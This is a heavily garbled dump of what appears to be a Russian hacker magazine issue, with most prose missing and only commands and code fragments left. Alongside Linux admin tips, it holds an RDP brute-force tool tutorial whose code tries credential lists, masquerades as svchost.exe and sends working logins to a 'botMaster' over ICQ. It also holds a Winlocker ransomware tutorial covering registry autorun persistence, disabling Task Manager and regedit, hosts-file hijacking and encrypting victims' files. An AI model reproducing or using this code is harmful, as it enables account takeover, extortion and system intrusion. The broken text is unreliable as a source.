, , , ,
.


IP- DNS- .
,
, . ,
192.168.0.1 , : 192.168.0.1/5.
.
/etc/conf.d/distccd,
, :
DISTCCD_OPTS="${DISTCCD_OPTS} --allow 192.168.0.0/24"

:
$ sudo rc-update add distccd default
$ sudo /etc/init.d/distccd start

distcc. distcc, :
$ sudo genkernel --kernel-cc=distcc all

Gentoo, FreeBSD , distcc,


. distcc
:
$ cd /usr/ports/devel/distcc
$ sudo make install clean

, . distcc /etc/rc.conf ,

:
distccd_enable="YES"
distccd_flags="--nice 5 --allow 192.168.1.0/24 --daemon --user distcc -P /var/run/distccd.pid"

,
( , ). '--allow' ,
. :
$ sudo /usr/local/etc/rc.d/distccd start

. /etc/make.conf
:
# vi /etc/make.conf
# distcc
CC = distcc
CXX = distcc
#
MAKE_ARGS=-j8

distcc CC CXX,

,
gcc g++:
# mkdir -p /usr/local/lib/distcc/bin
# cd /usr/local/lib/distcc/bin
# ln -s /usr/local/bin/distcc gcc
# ln -s /usr/local/bin/distcc g++
# ln -s /usr/local/bin/distcc cc
# ln -s /usr/local/bin/distcc c++

/root/.cshrc
:

. - ssh
distcc, :
# ssh-keygen -t dsa -f /etc/distcc/.ssh/id_dsa

(id_dsa.pub)
/etc/distcc/.ssh/authorized_keys , .
ssh portage , . - :
# chown -R distcc:daemon /etc/distcc
# chmod 644 /etc/distcc/.ssh/authorized_keys

setenv PATH /usr/local/lib/distcc/bin:$PATH

:
DISTCC_HOST, distcc-:
setenv DISTCC_HOSTS "127.0.0.1 192.168.1.2 192.168.1.3 192.168.1.4"

, - .
distcc distccmon-text. ,
distcc. , distccmontext N, N
. Gnome ( )
distccmon-gnome.
distcc.
Gentoo ,
-. FreeBSD
, distcc,
distcc, CC CXX /etc/make.conf /usr/local/
lib/distcc/bin .


distcc ,
,
,
, . VPN,
,
SSH-.

Gentoo,
/.
distcc.
,
. ,
. -,
( /etc/distcc):
# mkdir -p /etc/distcc/.ssh
# usermod -d /etc/distcc distcc

-, :
# usermod -s /bin/bash distcc

-, :

# chown portage:portage /etc/distcc/.ssh/id_dsa


# chmod 600 /etc/distcc/.ssh/id_dsa
# chmod 644 /etc/distcc/.ssh/id_dsa.pub

emerge ssh
-,
:
# ssh-keyscan -t rsa 1 2 3 \
> /var/tmp/portage/.ssh/known_hosts
# chown portage:portage /var/tmp/portage/.ssh/known_hosts

distcc:
# vi /etc/distcc/distcc-ssh
#!/bin/bash
exec /usr/bin/ssh -i /etc/distcc/.ssh/id_dsa "$@"

:
# chmod a+x /etc/distcc/distcc-ssh

/etc/make.conf:
# vi /etc/make.conf
MAKEOPTS="-j8"
FEATURES="distcc"
DISTCC_SSH="/etc/distcc/distcc-ssh"
DISTCC_HOSTS="localhost/2 distcc@1/3 distcc@2/5"


, ccache distcc, ,
,
,
. ,
, ,
. ,
ccache gcc distcc-, ,
INSTALL. z

# passwd -u distcc

UNIXOID
Adept adeptg@gmail.com


Linux

Linux. Distrowatch.com
649 ( ) ,
- . , ,
? ! ,
.

INSTALINUX


, .

.
? , LiveCD
( , ),
.

2 : . , ,
GUI
:).
:

netinstall-
.

SUSE STUDIO ;

RECONSTRUCTOR Debian Ubuntu;



:
UBUNTU CUSTOMIZATION KIT GUI-
Ubuntu;
RECONSTRUCTOR ;
REVISOR GUI-
Fedora;
LIVECD-CREATOR CLI-
Fedora.

SUSE STUDIO Novell,


.

(
LiveCD/LiveUSB) -


(
).
Suse Studio
(,
). OpenID Google, Yahoo Novell.

15 .

4 :
1. .
OpenSuse
11.2, SUSE Linux Enterprise 10 SUSE Linux
Enterprise 11 32-, 64-
. DE
Gnome, KDE IceWM,
.
2. ,
. ,

WARNING

warning

.
,
!


.
RPM. OpenSuse 8000
, . ,
LiveCD, .
3. .
:
, , ,
runlevel, ( MySQL
PostgreSQL),
, ,
, .
.
4. , (LiveCD, HDD/
Flash ) .
.
, ,

( Testdrive).
KVM. -
2 /.

ssh vnc. , :).
Modified Files,
. , Suse Studio
, , , ,
.

4000 . (,
)
. , must use Suse!

UBUNTU:
Reconstructor, , Debian Ubuntu. -
$5,
.
,
(, $0,3), $5
. ,
PayPal.

(
Debian 5, Ubuntu 9.04 9.10 x86
x86-64), DE (Gnome, KDE, Xfce Text Only)
(LiveCD ).
, ( ,

HTTP://WWW
Reconstructor.
). ,
,
.
,
, .
:
APT REPOSITORY UBUNTU PPA REPOSITORY
. ,

, Post Script;
INSTALL DEB PACKAGE deb;
SYSTEM UPGRADE ;
PRESEED Preseed-;
INSTALL FILE
;
: , , , Firefox ..
, , ( Build Project
). ,
(
)
. 10 .
, .
, Reconstructor
GPLv3,
.
, Reconstructor ,
, .
,
,
.

, www.
reconstructor.org/projects/reconstructor/files.
:
RECONSTRUCTOR ENGINE , -;
RECONSTRUCTOR ,
, -,

links
Suse Studio:
http://susestudio.com
Reconstructor:
https://reconstructor.
org
Instalinux:
www.instalinux.com
Ubuntu customization
Ubuntu
customization kit:
http://uck.
sourceforge.net
Revisor:
http://revisor.
fedoraunity.org
Calculate Linux
Scratch:
http://www.calculatelinux.org
Fedora.
! :)
http://spins.
fedoraproject.org
, , , ,
,

http://citkit.
ru/articles/1442/.


SuseStudio

Revisor
. ,
, ,
.
-,

. ,
chroot- , .
chroot (,
,
). , -,

Bash,
.
:
Windows- (Firefox, Thunderbird
..)
.


,
, , Instalinux
. -,

! -,
: CentOS, Debian, Fedora,

OpenSUSE, Scientific, Ubuntu. , ,


-, LiveCD/, netinstall-,
. 6
. ,
(
,
).
, .
(
), ( ).

( Ubuntu)
.
ISO.
.
, Ubuntu Xfce
12 , Fedora 12 LXDE -
227 ( , , , ).
30 /,
. ISO,

Preseed, Kickstart AutoYaST. , Install

, .
, (
- ). Debian
preseed, Fedora (Red Hat, CentOS ..) kickstart, OpenSuse AutoYaST.
:
http://wiki.debian.org/DebianInstaller/Preseed
http://fedoraproject.org/wiki/Anaconda/Kickstart
http://en.opensuse.org/AutoYaST


, .
Instalinux
,
Preseed/Kickstart/AutoYaST .
, . ,
.
! , CentOS (
). ,

:
CentOS
.


*BUNTU!
Ubuntu customization kit . jaunty
.

.
5 .
:
,
LiveCD, ;
DE (: kde, gnome, others).

DE;
ISO Ubuntu (Kubuntu, Xubuntu,
etc);
CD;
?
!
;
Windows- CD?
chroot
Synaptic,
.
main restricted,
.
, Synaptic, SettingsRepositories,
universe multiverse .
(, LiveCD)
chroot.
: exit,

.
,
Continue building.

SuseStudio TestDrive

Ubuntu customization kit


10.


, Fedora,
. GUI-
Revisor Livecd-creator CLI-. Revisor
UCK Reconstructor Fedora.
, ,
LiveCD,
.
Revisor Fedora,
,
:
# yum install revisor

Revisor, Livecd-creator
SELinux :
# setenforce 0

Revisor .
(CD/DVD
/ LiveCD).
. : /etc/revisor/revisor.conf
( ,
Fedora). ,
. , Revisor Fedora 12
Fedora 12 Fedora Rawhide
x86, x86-64 PPC. ,
Revisor , , Fedora 11
Fedora 13. kickstart-
, .
. :
,
(,
- ). , Revisor, , , (
2007).
( , ,
). , ,
, , SELinux, X Window
. Revisor
.

. Livecd-creator ,
.
LiveCD, ,
kickstart.
livecd-creator ( livecd-tools):

# yum install livecd-tools spin-kickstarts


l10n-kickstarts

,
.
/usr/share/spin-kickstarts. LiveCD
:
# livecd-creator --config=/usr/share/spin-kickstarts/fedora-livecd-desktop.ks \
    --fslabel=Fedora-LiveCD --cache=/var/cache/live

INFO

info
PPA (Personal
Packages Archive)


Ubuntu, http://
launchpad.net Canonical.

USERFRIENDLY GENTOO
Gentoo,
.
Calculate Linux
Scratch (CLS). CLS Gentoo
,
LiveCD/LiveUSB. OpenBox,
Gnome (CLSG). CLS,
LiveCD Builder. Live-,
.
,
:
# cl-builder


chroot /mnt/builder,
. , , -
.
, ( exit
<Ctrl+D>) Live-.
, LiveCD:
# calculate --iso

/usr/calculate/share/linux.
, ,

- - rw-.

HAPPY END

:
. ,
, Linux from
Scratch... z


UNIXOID
zobni n@gmail.com

UNIX- , ,
.
,
. .
HTTP-

HTTP-, , .
, netcat 80-
PostScript, .

HTTP- bash 222
(http://alexey.sveshnikov.ru/blog/2006/12/23/
http----222-/).
UNIX- nc,
:
server$ nc -l -p 8080 < file
client$ x-www-browser http://192.168.0.1:8080

HTTP-,



.
,
google chrome
,
:
$ while true; do nc -vv -l -p 8080 -c '( read a b c; file=`echo $b | sed 's/[^a-zA-Z0-9.]//g'`; if [ a$file = "a" ]; then ls -l; else cat $file; fi )'; sleep 1; done

.
,
.

.
,
HTTP- (
MIME-),
404

index.html. , ,
.
HTTP- Martin A. Godisch.

- bash
awk, PostScript,
Adobe Systems

.
, ,
, http://
people.debian.org/~godisch/pshttpd
.


CUPS
CUPS,
UNIX-,
,


cwget-
,
.
,
, CUPS

. CUPS
:
1. cwget.sh,

CUPS-:
$ sudo vi /usr/local/sbin/cwget.sh
#!/bin/sh
DOWNLOAD_DIR=$1
cd
mkdir -p "$DOWNLOAD_DIR"
cd "$DOWNLOAD_DIR"
/usr/bin/wget -nc -i "$2" >/dev/null 2>&1

:
$ sudo chmod +x /usr/local/sbin/cwget.sh

2. CUPS-,
URL
:
$ sudo vi /usr/lib/cups/backend/cwget
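#!/bin/sh
# Called with no arguments, a CUPS backend must describe itself
if [ $# -eq 0 ]; then
    echo 'cups wget "Unknown" "Cups wget downloader"'
    exit 0
fi
#
DOWNLOAD_DIR=/var/tmp
# mktemp gives an unpredictable, owner-only file instead of
# a world-writable /tmp/cwget$$ that other local users could tamper with
TMPFILE=$(mktemp /tmp/cwget.XXXXXX) || exit 1
# $6 is the job file holding the URL list, $2 is the submitting user
cat "$6" > "$TMPFILE"
# the submitting user only needs to read the list
/bin/chmod 644 "$TMPFILE"
/usr/bin/sudo -H -u "$2" /usr/local/sbin/cwget.sh "$DOWNLOAD_DIR" "$TMPFILE"
rm -f "$TMPFILE"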

:
$ sudo chmod +x /usr/lib/cups/backend/cwget

3. sudo

aucat(1)
cwget.sh ,
lp,
CUPS-, :
$ sudo visudo
lp ALL=(ALL) NOPASSWD:/usr/local/sbin/cwget.sh

4. web-,
cwget ( cwget-)
,
(
).
5. , (URL)
. , , :
$ echo 'http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.33.tar.bz2' | lpr -Ppcwget

HTTP://WWW
links
bash:
http://slashdot.org/
articles/01/02/
15/046242.shtml

mp3-:
www.xakep.
ru/magazine/
xa/062/110/1.asp

OPENBSD
Open' aucat, .au,

, ,

, ,
aucat.
OpenBSD-
, -
. , , :
1. aucat
. , aucat UNIX-,
(), ().
2. aucat
aucat,
ssh. ,
aucat UNIX-, aucat- ,
aucat- UNIX-
aucat-.
.
3. 2 , .

INFO

info
PostScript
.



.


:
user1@host1> aucat -l
user1@host1> aucat -o - | ssh user1@host2 aucat -i -
user2@host2> aucat -l
user2@host2> aucat -o - | ssh user2@host1 aucat -i -


. ,
, aucat UNIX (
/tmp/aucat-ID-/default),
aucat
, ID
.
, aucat
.
aucat,
host2 ssh,
user1,

user2,
. ,
ID
,

/tmp/aucat-ID-
.
:
u1@h1> user1_UID=`id -ur user1`
u1@h1> user2_UID=`id -ur user2`
u1@h1> aucat -l; cd /tmp/
u1@h1> chmod 755 aucat-$user1_UID
u1@h1> ln -s aucat-$user1_UID aucat-$user2_UID
u2@h2> user2_UID=`id -ur user2`
u2@h2> user1_UID=`id -ur user1`
u2@h2> aucat -l; cd /tmp/
u2@h2> chmod 755 aucat-$user2_UID
u2@h2> ln -s aucat-$user2_UID aucat-$user1_UID


,

. Linux
,
VESA,
-.
Memory
Technology Device (MTD), ,
,
PCI. ,
. , , make
menuconfig, Device Drivers
:
$ sudo make menuconfig
Device Drivers --->
<M> Memory Technology Device (MTD)
support --->
<M> Direct char device access to
MTD devices
<M> Common interface to block
layer for MTD 'translation layers
<M> Caching block device access
to MTD devices
Self-contained MTD device
drivers --->
<M> Physical system RAM


PCI.
lspci :
$ lspci | grep VGA

:
. ,
,


11000 :

02:00.0 VGA compatible controller:


nVidia Corporation NV35 [GeForce FX
5900XT] (rev a1)

:
$ lspci -vvv -s 02:00.0

user1@host1> aucat -b 1 -r 11000 -o - \
    | ssh user1@host2 aucat -b 1 -r 11000 -i -


,
prefetcheble.

SED

SED
, (
),
3D-. , ,
,
2D-
( ,
), 3D
. ,
,
, ,
.
1024x768@32 1024 * 768
* 4 = 3145728 (32 = 4 ) 3 .
, , ,
, ,
,
, ( ).

lspci prefetcheble- .
Memory at
e0000000.
8

800000.
e0800000. phram,
( 128 , 8 120 ):
$ sudo modprobe phram phram=VRAM,0xe0800000,120Mi

MTD:

prefetchable- lspci

$ cat /proc/mtd

,
. , mtdblock, /dev/mtd0
/dev/mtdblock0:
$ sudo modprobe mtdblock

, :
$ sudo mkswap /dev/mtdblock0
$ sudo swapon /dev/mtdblock0

:
$ sudo mkfs.ext2 /dev/mtdblock0

, /etc/X11/xorg.conf
Device Driver "vesa".

,

SED (Stream EDitor), UNIX
,
,
,
. ,
UNIX- ,
, SED
- (http://uuner.livejournal.com/55238.html). ,
, , ,
.
, , (http://sed.sourceforge.net) 11 ,
, . ,
Apache, SED- web-.

JABBER SSH
SSH-
. ,
22- ,
NAT. , , jabber-,
jabber-,
.
, , ,
. ,
www.ylsoftware.com. ,
.
, :
$ wget ylsoftware.com/jabber-shell-20090303.tar.bz2

$ tar -xjf jabber-shell-20090303.tar.bz2


$ vi ~/.jabber-shell
(
#
'server' => 'jabber.ru',
'port' => '5222',
# ,
'username' => 'jabber-shell',
'password' => 'password',
#
'resource' => 'jabber-shell',
# JID
'admins' => 'admin1@host.com admin2@host.ru',
)

JID' (
) , admins.
perl, libnet-xmppperl libnet-jabber-perl :
$ ./jabber-shell.pl &

WEB-
www.youtube.com/watch?v=LG
HItQK2fA8&feature=player_embedded, ,
python-, ,
web-. ,
.
cmake, python, python-xlib,

OpenCV (http://opencv.sf.net). , :
$ tar -xjf OpenCV-2.0.0.tar.bz2
$ cd OpenCV-2.0.0
$ mkdir release; cd release
$ cmake -D CMAKE_BUILD_TYPE=RELEASE \
    -D CMAKE_INSTALL_PREFIX=/usr/local \
    -D BUILD_PYTHON_SUPPORT=ON ..
$ sudo make install

cam-mouse-ctrl.py,
, .

?
, .
, ,
( :).z


CODING
RankoR, rankor777@gmail.com, ax-soft.ru


-

RDP-

,
. tss-brute metal ActiveX-based ,
Dizz .
- tss-brute (RDP Brute by Dizz) R&D P Brute.
Windows. , !

, , - ,
.
metala ( ).
, mstsc.
exe.
ActiveX-based ActiveX
.
, ,
, n ,
n .
(
, !). ,
Windows
Server 2003, .


, , ,
Windows NT,

RDP 5!

2009 . RDP, , ,
. , ,
rdesktop RDP- , X-
.
. - ,
. ,
.
, ,

HTTP://WWW
links
forum.asechka.ru

ICQ
ax-soft.ru


qt.nokia.com Qt

WARNING
warning

Qt Creator
, rdesktop . , , ,
- ! , , ,
.
. pudn.
com winRDesktop rdesktopa Windows,
MS Visual Studio. ,
, .
,
. ,
:
1. winrdesktop,
, IP .
.
2. GUI -, :
, IP, ICQ-. GUI
C++ Qt.
,
,
ICQ Delphi/BCB?
Qt- QOSCAR ICQ
(, , ),
qoscar.googlecode.com.
, , ( ) .
, , !

DEVELOPERS, DEVELOPERS, DEVELOPERS!


WinRDesktopa. ,
, ,
"PUDN". , Rdesktop
. - Rdesktop! . Visual Studio 2008
( VC++ 2008 Express, Professional
,

, ,
DreamsPark,
. VC 9,
VS2008
.

rdesktop.h,
. ,
Win 2k, , ,
. , Win 2000
.
? ,
/ . ,
#define LOGON_AUTH_FAILED\xfe\x00\x00 ,
.
.
.
, ? :)
process_text2()
orders.c. - . , ,
PDU_LOGON.
:
process_text2()
if (!memcmp(os->text, LOGON_AUTH_FAILED, 3))
ExitProcess(2);



.
,
,

.

DVD
dvd

INFO

info

RDP Qt
,

RDesktop Qt

if((!memcmp(os->text, LOGON_MESSAGE_FAILED_
XP, 18)) || (!memcmp(os->text,LOGON_MESSAGE_
FAILED_2K3, 18)))
ExitProcess(3);

.
.


winRDesktop Visual Studio 2008

rocess_text2() , ( ),

logone. rdp.c process_
data_pdu(). , case
RDP_DATA_PDU_LOGON:. ExitProcess(4) .
ExitProcess() .
, winRdesktopa .
, .
.
, . ,
ShowWindow SW_HIDE.
,
? Printf()
, .

ExitCode.
, ExitProcess(4) ,
ExitProcess(2) , ExitProcess(3)
. ( process_text2() ).
, . , , 30
100% MSI Wind u90. (RDP- ). (
)
( , ?),
,
. ,
, :).
, , - , .
, , ,
:).

, , ,
metala. , , ,
, ,
-.
, C#,
( , ) Qt
Framework. ][ ,
. ,
.
Qt qt.nokia.com
( Qt Software,


,
).
Qt Creator ( snapshot
, stable-, ,
). , GUI-
. ,
. .
.
1. .
2. .exe-,
, .
3. , , ,
, 2.
BruteThread, ,
, , QThread,
,
. BruteThread winRDesktopa
process QProcess. QProcess
, ,
(, printf cout, ), .

, void started() void finished(int
exitCode) .
,
.
,
onFinished().
, ;.
:

QStringList slArgs;
slArgs << "-u" << slLogins.at(iCurrentLogin)
<< "-p" << slPasswords.at(iCurrentPassword)
<< sServer;
process.start(svchost.exe, slArgs);
iCurrentPassword++;

, QStringList,
:).
, ,
:
QObject::connect(&process, SIGNAL(finished(int)),
this, SLOT(onFinished(int)));

, :
metal aka DeX C/C++,
, !
.fry OSCAR,
forum.asechka.ru .
:
xo0x.art, vitalikis,
Sundagy /C++,
Miracle :),
, , :).


onFinished()
if ( exitCode > 666 )
{
emit onServerResult(sServer,
slLogins.at(iCurrentLogin),
slPasswords.at(iCurrentPassword-1),
exitCode);
emit onDoneServer(this);
return;

onServerResult() Qt Creator

, :

}
switch ( exitCode )
{
case 666: //
emit onDoneServer(this);
return;


if ( iResult == 0 )
{
iGood++;
iChecked++;

case 0: //
emit onServerResult(sServer,
slLogins.at(iCurrentLogin),
slPasswords.at(iCurrentPassword-1),
true);

writeResult(QString("%1:%2;%3").arg(sServer
).arg(sUser).arg(sPassword), "good.txt");

if ( bSkipZero )
{
emit onDoneServer(this);
return;
}
break;

oscar.sendMessage(settings.botMaster(),
QString("%1:%2;%3").arg(sServer).arg(sUser)
.arg(sPassword));
if ( trayIcon.isVisible() )
trayIcon.showMessage("Good",
QString("%1:%2;%3").arg(sServer).arg(
sUser).arg(sPassword));
}
else
if ( iResult == -1 )
{
iBad++;
iChecked++;
}

case 4: // !
emit onServerResult(sServer,
slLogins.at(iCurrentLogin),
slPasswords.at(iCurrentPassword-1),
0);
emit onDoneServer(this);
return;
case 5: //
emit onServerResult(sServer,
slLogins.at(iCurrentLogin),
slPasswords.at(iCurrentPassword-1),
0);

DONE!

! ,
. ,
,
, , , -,
. , , ,
, :).

R&D P Brute, , (
!), (
mstscax.dll, ??, ShowMessage()???).
, , , brain.dll hands.lib
( sslBot , ). ,
.
,
:
1) .
2) ( , ).
. !z

emit onDoneServer(this);
return;
default: //
emit onServerResult(sServer,
slLogins.at(iCurrentLogin),
slPasswords.at(iCurrentPassword-1),
-1);
break;
}
nextPassword();

CODING
Spider_NET


TROJAN.WINLOCK

,
,
, , .
?
, 10% . ,
,
:
, Windows.
?

( ,

). ,
. .
:
1. . ,
.
web- , ,
, . , (
).

?.
: -


. ,
. security-, (
) .
, .
2. FLASH. Adobe .
flash-,
. ,
, .
,
, .

. ,

.
3. .
,

WINDOWS API
wc.cbSize:=sizeof(wc);
wc.style:=cs_hredraw or cs_vredraw;
wc.lpfnWndProc:=@WindowProc;
wc.cbClsExtra:=0;
wc.cbWndExtra:=0;
wc.hInstance:=HInstance;
wc.hIcon:=LoadIcon(0,idi_application);
wc.hCursor:=LoadCursor(0,idc_arrow);
wc.hbrBackground:=COLOR_BTNFACE+1;
wc.lpszMenuName:=nil;
wc.lpszClassName:=win_main;
RegisterClassEx(wc);
leftPos:=20;
topPos:=0;
windowWidth:=Screen.Width;
WindowHeight:=Screen.Height;
MainWnd:=CreateWindowEx(
0,
win_main,
test,
ws_overlappedwindow,
leftPos,
topPos,
windowWidth,
windowHeight,
0,
0,
Hinstance,
nil
);

msdn

WINAPI
var
Key: HKey;
begin
//
.
RegOpenKey(HKEY_LOCAL_MACHINE,
PChar(), Key);

SetWindowLong(MainWnd, GWL_HWNDPARENT,
GetDesktopWindow);

RegSetValueEx(Key,PChar(paramstr(0)),
0, REG_SZ,
pchar(paramstr(0)),
lstrlen(pchar(paramstr(0)))+1);

SetWindowPos(MainWnd, HWND_TOPMOST,
0, 0, 0, 0, SWP_NOMOVE or SWP_NOSIZE);

RegCloseKey(Key);
end;

ShowWindow(MainWnd, CmdShow);
While GetMessage(Mesg,0,0,0) do
begin
TranslateMessage(Mesg);
DispatchMessage(Mesg);
end;

.
,
Winlocker, flash- .
, , , .

, ,
Delphi. exe
!, . , .
API. ,

WARNING
warning

-
.


,



.

.

100 .
- .

WINLOCKER

Winlockera ,
. ,
,
. ,
, . ,
-,
. , ,
.

,
.

WM_SYSCOMMAND. ,



(. ) WM_SYSCOMMAND. ,

.

.
. : . ,
,
. , :
1. HKLM\Software\Microsoft\Windows\CurrentVersion\Run
, .
2. HKCU\Software\Microsoft\Windows\CurrentVersion\Run ,
, ,
.
3. HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
, .
4. HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\
Run ,
.
5. HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows
, ,
Windows.
6. HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
, .
7. . , ,
, .


? ,
- .
, . WinAPI
.


var
disk:DWORD;
begin
case Msg.WParam of
DBT_DEVICEARRIVAL: //
if (PDEV_BROADCAST_HDR(Msg.LParam)^
.dbch_devicetype = DBT_DEVTYP_VOLUME) then
begin
//
disk := PDEV_BROADAST_VOLUME(Msg.LParam" ")^
.dbcv_unitmask;
//
end;
DBT_DEVICEREMOVECOMPLETE: //
if (PDEV_BROADCAST_HDR(Msg.LParam)^
.dbch_devicetype = DBT_DEVTYP_VOLUME) then
begin
//
end;


WEB-
var
_buff: array [0..1024] of char;
_request:string;
_temp: string;
_path: string;
_FileStream : TFileStream;
begin
Recv(_client, _buff, 1024, 0);
_request:=string(_buff);
_path := GetFilePath (Copy
(_request, 1, pos(#13, _request)));
_path := ReplaceSlash(_path);
if ((_path = '') or (_path = '\')) Then
_path := DocumentRoot + '\' + DirectoryIndex;
{ else
if ((_path[length(_path)] ='\')) Then
_path := DocumentRoot + '\' +
DirectoryIndex; }
if (FileExists(_Path)) Then
begin
_FileStream :=
TFileStream.Create(_Path, fmOpenRead);
SendStr(_Client, 'HTTP/1.0 200 OK');
SendStr(_Client, 'Server: xSrV');
SendStr(_Client, 'Content-Length:' +
IntToStr(_FileStream.Size));
SendStr(_Client, 'Content-Type: '
+ GetTypeContent(_Path));
SendStr(_Client, 'Connection: close');
SendStr(_Client, '');
SendFile(_Client, _FileStream);
_FileStream.Free;
End
//

, !

.
, .
. . Windows (, Pro
) gpedit.
.
, ,

. , , .
, ,
. ? :
, ProcessMonitor
. ,
.


Windows regedit.
,
.
.
. , DisableRegistryTools 1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System.

, ,
. , .
DisableTaskMgr ( dword) 1
, DisableRegistryTools.

. ,
NoAddRemovePrograms 1 ( dword) , DisableRegistryTools.

,

.
!
NoViewOnDrive (dword) HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer.
. , C 4. ,
,
. , 12 C (4) D (8).


1:


. ,
, . : HKEY_CURRENT_
USER\Microsoft\Windows\CurrentVersion\Policies\Explorer\
RestrictRun. ( REG_SZ)
,
RestrictRun dword
1.

,
.
,

.
NoManageMyComputerVerb dword 1
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer.

, (, ).

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services.
start.
,
, start 3. ,
, .

.

Winlocker ,
, .
, ,
. ,
,
.
: , ,
skype .. -
, .
, , .


? ! , ,
.
, ,
. ?
. ,
. . ,
WM_DEVICECHANGE. 3.
,
, Delphi.
.
MSDN, ,
DVD.

2: !

web- ?
, :
, , , facebook, twitter, etc.
. ?
, ,
. , . ,
,
. , ,

.
. ,
. , ,
.
, ? ,
.

. .
hosts.

:ip.
web-.
?.
evil-,
. , .
,
web.
localhost.
: 127.0.0.1 www.odnoclassniki.ru
hosts ,
, Delphi WEB-.
, Winsock API. (FTP, PROXY,
IRC ..) api-.

( . .). ? !
, ., ,
evil-. , web-
(
, ). :
, web-

Key: TWordTriple): boolean;


//
function MemoryDecrypt(Src: Pointer;
SrcSize: Cardinal; Target: Pointer;
TargetSize: Cardinal; Key: TWordTriple): boolean;

,
.

4: !

ProcessMonitor
. ,
,
. ,
, .

3:

-
SMS? -. ,
. ?
, / , :
(doc, xls, mdb, ppt, txt), (jpeg, png, bmp),
(php, pas, c, h, cpp, dpr, py ..).
- ,
,
.
.
FindFirs() FindNext()
Sysutils. , .
,
: FindFirstFile() FindNextFile().
(.
), .
Delphi
. . ,
torry.net . ,
Delphi. :
//
function FileEncrypt(InFile, OutFile: String;
Key: TWordTriple): boolean;
//
function FileDecrypt(InFile, OutFile: String;
Key: TWordTriple): boolean;
//
function TextEncrypt(const s: string;
Key: TWordTriple): string;
//
function TextDecrypt(const s: string;
Key: TWordTriple): string;
// ""
function MemoryEncrypt(Src: Pointer; SrcSize:
Cardinal;
Target: Pointer; TargetSize: Cardinal;


.
. ( ), , winlocker -. :
. ,
. .

. , .
joiner . , (. #104)
.

5:

, Winlocker
.
, ,
. :
system.exe, user32.exe, csrss.exe, eplorer.exe .
, , ,
.
,
:
1. .
, .
2. . , API .
API. !
3. .

6:


.
,
. ,
, ,
.

WORK COMPLETE

WinLocker
. -

, .
Winlockera. ,
.
? ! ,

, . ,
. , . , ,
. ,
,
:). z


CODING
presidentua , http://tutamc.com

INPRIVATE

IE8
, Microsoft. , ,

. , ,
,
, , .
SMARTSCREEN


SmartScreen Internet Exlorer, -

SAFE BROWSING GOOGLE


. http://safebrowsing.clients.google.com/
Chrome FireFox md5 url. md5 , , , md5
. , . API.
, .
http://code.google.com.


. SmartScreen
urs.
microsoft.com :
POST /urs.asmx?MSPRU-Client-Key=l7m7EvM2K/IVNQCBF7AVPg%3d%3d&MSPRU-Patented-Lock=XdXWSI8WgDg%3d HTTP/1.1
Host: urs.microsoft.com
<soap:Envelope ...><soap:Body><Lookup xmlns="http://Microsoft.STS.STSWeb/">
<r soapenc:arrayType="xsd:string[1]"><string>http://tutamc.com</string></r>
<ID>{B3BB5BBA-E7D5-40AB-A041-A5B1C0B26C8F}</ID>
<v soapenc:arrayType="xsd:string[5]"><string>7.0.6004.6</string><string>7.00.5824.16386</string><string>7.0.6000.16386</string><string>6.0.6000.0.0</string><string>en-us</string></v>
</Lookup></soap:Body></soap:Envelope>

SmartScreen

IE

IE URL , , , ,
, IP-. . -
, -,
. - , -
IP- . ,

, ,
: ,
, . , SmartScreen, ,
.
:), ,

. , ,
.
URL
Opera. ! ,

. ,
Chrome FireFox.
IE 8 -
(InPrivate Browsing), .
,
.
, -. -,
, IE
. , - SmartScreen
,
.
, .
IE
. urs.
microsoft.com. ,
. , . -? (
, ) .
! InPrivat !

, . . .
,
, ,
.

, ? , . , -

DVD
dvd

-
IE



,

HTTP://WWW
links

Safe Browsing
Google
http://code.
google.com/apis/
safebrowsing
Python

http://pywinauto.
openqa.org


FireFox ,
, ,

FireFox


IE

def do_CONNECT(self):
    open('d:\\test.txt', 'w+').close()
    #

, IE , , - test.txt. ,
, :

,

,
.

URL. , IE,
:
C:\Documents and Settings\admin\Local Settings\Temporary Internet
Files\AntiPhishing\2CEDBFBC-DBA8-43AA-B1FD-CC8E6316E3E2.dat
( XP).
, IE
.
, , ,
, . .
, ?
Socks-,
-,
, urs.microsoft.com, .
, , , ,
, ,
!

, , , PYTHON!

- , .
TinyHTTPProxy, , ,
Pythone. do_CONNECT,
HTTPS-. IE ,
urs.microsoft.com.

, -,
.
, , .


import os
import time

urls = (
    'http://not_porn1.com/',
    'http://super_puper_porn1.com/',
)
for url in urls:
    time.sleep(1)
    # remove the marker file left by the previous check
    try:
        os.remove('d:\\test.txt')
    except OSError:
        pass
    test_url(url)
    if not os.path.exists('d:\\test.txt'):
        print "U were on this site: %s" % url

test_url, IE
URL. , ,
, Python IE ,
IE (
), IE.
pywinauto (http://pywinauto.
openqa.org), WinAPI. IE:
prog_ie = r"C:\Program Files\Internet Explorer\iexplore.exe"
application.Application.start("%s %s" % (prog_ie, url.decode('utf-8')))

WinAPI,
:
import string
import win32gui
import win32con

def window_enumeration_handler_ie(hwnd, resultList):
    # collect the handles of windows whose title mentions Internet Explorer
    if string.find(win32gui.GetWindowText(hwnd),
                   "Internet Explorer") != -1:
        resultList.append(hwnd)

def close_program_ie():
    ie_windows = []
    win32gui.EnumWindows(window_enumeration_handler_ie,
                         ie_windows)
    for i in ie_windows:
        win32gui.SendMessage(i, win32con.WM_CLOSE, 0, 0)

IE

Google Safe Browsing

ILDASM

window_enumeration_handler_ie title, IE, .


close_program_ie,
WinAPI EnumWindows
IE. WM_CLOSE,
.
, test_url:
import time
import win32gui
import win32con
from pywinauto import application

def test_url(url):
    prog_ie = r"C:\Program Files\Internet Explorer\iexplore.exe"
    application.Application.start("%s %s" %
                                  (prog_ie, url.decode('utf-8')))
    time.sleep(5)
    close_program_ie()
    time.sleep(2)

-
. , -
.
IE,
. , , .
, IE Reset IE, -
, . ,
: , IE . :).

,
IE - .
, :
,
, ;
,
( !) .
, IE , .
InPrivate Browsing -,
(- ,
.),
-. z


CODING
deeonis deeonis@gmail.com

C++

++ -
,
.
,

.
, C++
.
, ,
.
. -
: , , .

, ,
,
C++.


. ,
D (derived, ),
B (base, ). ,
,
D B,
